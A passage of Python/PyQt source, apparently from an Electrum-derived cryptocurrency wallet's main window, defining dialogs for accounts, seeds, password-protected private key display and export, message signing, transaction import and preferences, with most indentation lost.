self.receive_list.filter(t, [0, 1, 2, 3, 4]) # Date, Account, Address, Description, Amount
elif i == 3:
self.address_list.filter(t, [0,1, 2]) # Address, Label, Balance
elif i == 4:
self.contacts_list.filter(t, [0, 1]) # Key, Value
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
if self.set_contact(unicode(line2.text()), str(line1.text())):
self.tabs.setCurrentIndex(4)
def update_new_account_menu(self):
self.new_account_menu.setVisible(self.wallet.can_create_accounts())
self.new_account_menu.setEnabled(self.wallet.permit_account_naming())
self.update_account_selector()
def new_account_dialog(self):
dialog = WindowModalDialog(self, _("New Account Name"))
vbox = QVBoxLayout()
msg = _("Enter a name to give the account. You will not be "
"permitted to create further accounts until the new account "
"receives at least one transaction.") + "\n"
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
e = QLineEdit()
vbox.addWidget(e)
vbox.addLayout(Buttons(CancelButton(dialog), OkButton(dialog)))
dialog.setLayout(vbox)
if dialog.exec_():
self.wallet.set_label(self.wallet.last_account_id(), str(e.text()))
self.address_list.update()
self.tabs.setCurrentIndex(3)
self.update_new_account_menu()
def check_next_account(self):
if self.wallet.needs_next_account() and not self.checking_accounts:
self.checking_accounts = True
msg = _("All the accounts in your wallet have received "
"transactions. Electrum must check whether more "
"accounts exist; one will only be shown if "
"it has been used or you give it a name.")
self.show_message(msg, title=_("Check Accounts"))
self.create_next_account()
@protected
def create_next_account(self, password):
def on_done():
self.checking_accounts = False
self.update_new_account_menu()
task = partial(self.wallet.create_next_account, password)
self.wallet.thread.add(task, on_done=on_done)
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_dict = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
sorted_keys = sorted(mpk_dict.keys())
def show_mpk(index):
mpk_text.setText(mpk_dict[sorted_keys[index]])
        # only show the combobox if more than one master public key is available
if len(mpk_dict) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
                    is_mine = key in self.wallet.master_private_keys
mine_text = [_("cosigner"), _("self")]
return "%s (%s)" % (key, mine_text[is_mine])
return key
labels = list(map(label, sorted_keys))
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels,
on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if self.wallet.use_encryption and password is None:
return # User cancelled password input
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
try:
mnemonic = self.wallet.get_mnemonic(password)
except BaseException as e:
self.show_error(str(e))
return
from seed_dialog import SeedDialog
d = SeedDialog(self, mnemonic, self.wallet.has_imported_keys())
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
def show_public_keys(self, address):
if not address: return
try:
pubkey_list = self.wallet.get_public_keys(address)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Public key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
if isinstance(self.wallet, BIP32_RD_Wallet):
derivation = self.wallet.address_id(address)
vbox.addWidget(QLabel(_("Derivation") + ': ' + derivation))
vbox.addWidget(QLabel(_("Public key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pubkey_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address: return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
@protected
def do_sign(self, address, message, signature, password):
message = unicode(message.toPlainText()).encode('utf-8')
task = partial(self.wallet.sign_message, str(address.text()),
message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
message = unicode(message.toPlainText())
message = message.encode('utf-8')
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address.text(), sig, message)
except:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = str(encrypted_e.toPlainText())
task = partial(self.wallet.decrypt_message, str(pubkey_e.text()),
cyphertext, password)
self.wallet.thread.add(task, on_success=message_e.setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = unicode(message_e.toPlainText())
message = message.encode('utf-8')
try:
encrypted = bitcoin.encrypt_message(message, str(pubkey_e.text()))
encrypted_e.setText(encrypted)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_keys(address)[0]
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
parent = parent or self
d = WindowModalDialog(parent, _("Enter Password"))
pw = QLineEdit()
        pw.setEchoMode(QLineEdit.Password)
vbox = QVBoxLayout()
if not msg:
msg = _('Please enter your password')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
if not d.exec_(): return
return unicode(pw.text())
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_qr(self.config)
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
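        # Electrum packs raw transactions in base43 for QR codes (its alphabet fits
        # QR alphanumeric mode, keeping codes compact); the bytes decoded above are
        # hex-encoded so tx_from_text() can parse them.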
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
try:
self.wallet.check_password(password)
except Exception as e:
self.show_error(str(e))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.addresses(True)
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
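        # The worker thread above emits Qt signals so the dialog is updated from the
        # GUI thread; setting 'done' below stops it early if the dialog is cancelled
        # before all keys have been exported.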
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.dat")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.dat', "*.dat")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f)
self.show_message(_("Your labels where exported to") + " '%s'" % str(fileName))
        except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
        except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, confirmations, value, timestamp, balance = item
if confirmations:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = "unknown"
else:
time_string = "unconfirmed"
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses(self.current_account)
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text())
if bitcoin.is_address(addr):
return addr
def get_pk():
pk = str(keys_e.toPlainText()).strip()
if Wallet.is_private_key(pk):
return pk.split()
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
if not d.exec_():
return
fee = self.wallet.fee_per_kb(self.config)
tx = Transaction.sweep(get_pk(), self.network, get_address(), fee)
if not tx:
self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
return
self.warn_if_watching_only()
self.show_transaction(tx)
@protected
def do_import_privkey(self, password):
if not self.wallet.has_imported_keys():
if not self.question('<b>'+_('Warning') +':\n</b><br/>'+ _('Imported keys are not recoverable from seed.') + ' ' \
+ _('If you ever need to restore your wallet from its seed, these keys will be lost.') + '<p>' \
+ _('Are you sure you understand what you are doing?'), title=_('Warning')):
return
text = text_dialog(self, _('Import private keys'), _("Enter private keys")+':', _("Import"))
if not text: return
text = str(text).split()
badkeys = []
addrlist = []
for key in text:
try:
addr = self.wallet.import_key(key, password)
except Exception as e:
badkeys.append(key)
continue
if not addr:
badkeys.append(key)
else:
addrlist.append(addr)
if addrlist:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(addrlist))
if badkeys:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(badkeys))
self.address_list.update()
self.history_list.update()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Fee per kilobyte of transaction.')
])
fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
fee_e = BTCkBEdit(self.get_decimal_point)
def on_fee(is_done):
if self.config.get('dynamic_fees'):
return
v = fee_e.get_amount() or 0
self.config.set_key('fee_per_kb', v, is_done)
self.update_fee()
fee_e.editingFinished.connect(lambda: on_fee(True))
fee_e.textEdited.connect(lambda: on_fee(False))
tx_widgets.append((fee_label, fee_e))
dynfee_cb = QCheckBox(_('Dynamic fees'))
dynfee_cb.setChecked(self.config.get('dynamic_fees', False))
dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
dynfee_sl = QSlider(Qt.Horizontal, self)
# The pref is from 0 to 100; add 50 to get the factor from 50% to 150%
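        # e.g. a slider position of 25 corresponds to a multiplier of (25 + 50)% = 75%
        # of the recommended fee per kB; see slider_moved() and slider_released() below.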
dynfee_sl.setRange(0, 100)
dynfee_sl.setTickInterval(10)
dynfee_sl.setTickPosition(QSlider.TicksBelow)
dynfee_sl.setValue(self.config.get('fee_factor', 50))
dynfee_sl.setToolTip("Min = 50%, Max = 150%")
multiplier_label = HelpLabel("", _("Multiply the recommended fee/kb value by a constant factor. Min = 50%, Max = 150%"))
tx_widgets.append((dynfee_cb, dynfee_sl))
tx_widgets.append((None, multiplier_label))
def update_feeperkb():
fee_e.setAmount(self.wallet.fee_per_kb(self.config))
b = self.config.get('dynamic_fees', False)
dynfee_sl.setEnabled(b)
multiplier_label.setEnabled(b)
fee_e.setEnabled(not b)
def slider_moved():
multiplier_label.setText(_('Fee multiplier: %3d%%')
% (dynfee_sl.sliderPosition() + 50))
def slider_released():
self.config.set_key('fee_factor', dynfee_sl.sliderPosition(), False)
update_feeperkb()
def on_dynfee(x):
dynfee = x == Qt.Checked
self.config.set_key('dynamic_fees', dynfee)
update_feeperkb()
dynfee_cb.stateChanged.connect(on_dynfee)
dynfee_sl.valueChanged.connect(slider_moved)
dynfee_sl.sliderReleased.connect(slider_released)
update_feeperkb()
slider_moved()
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['WLC', 'mWLC', 'µWLC']
msg = _('Base unit of your wallet.')\
              + '\n1 WLC = 1000 mWLC.\n' \
              + _('This setting affects the fields in the Send tab.') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'WLC':
self.decimal_point = 8
elif unit_result == 'mWLC':
self.decimal_point = 5
elif unit_result == 'µWLC':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.receive_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(block_explorer_info.keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_explorers.index(block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.zbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((usechange_cb, None))
tx_widgets.append((multiple_cb, None))
showtx_cb = QCheckBox(_('View transaction before signing'))
showtx_cb.setChecked(self.show_before_broadcast())
showtx_cb.stateChanged.connect(lambda x: self.set_show_before_broadcast(showtx_cb.isChecked()))
        showtx_cb.setToolTip(_('Display the details of your transaction before signing it.'))
tx_widgets.append((showtx_cb, None))
can_edit_fees_cb = QCheckBox(_('Set transaction fees manually'))
can_edit_fees_cb.setChecked(self.config.get('can_edit_fees', False))
def on_editfees(x):
self.config.set_key('can_edit_fees', x == Qt.Checked)
self.update_fee_edit()
can_edit_fees_cb.stateChanged.connect(on_editfees)
can_edit_fees_cb.setToolTip(_('This option lets you edit fees in the send tab.'))
tx_widgets.append((can_edit_fees_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
tabs_info = [
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
if not self.network:
self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
return
NetworkDialog(self.wallet.network, self.config, self).do_exec()
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_wallet_type'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
